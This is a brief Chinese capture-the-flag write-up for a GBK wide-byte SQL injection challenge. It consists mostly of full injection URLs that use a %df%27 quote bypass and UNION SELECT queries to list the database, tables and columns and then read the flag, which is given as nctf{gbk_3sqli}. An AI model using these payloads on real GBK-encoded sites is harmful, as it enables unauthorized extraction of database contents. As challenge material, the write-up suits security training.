题目地址:http://chinalover.sinaapp.com/SQL-GBK/index.php
首先观察源代码,发现是gbk编码,考虑到GBK INJECT
题目没有做任何过滤。
但是这边要用url编码来转一下‘#’。
爆库名:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,database()%23库名:sae-chinalover
爆表名:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20%23表名:ctf,ctf2,ctf3,ctf4,news
爆列名:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27+union+select+1,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x63746634)--+
列名:id,flag
爆数据库内容:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27+union+select+1,(select%20flag%20from%20ctf4)--+flag:nctf{gbk_3sqli}
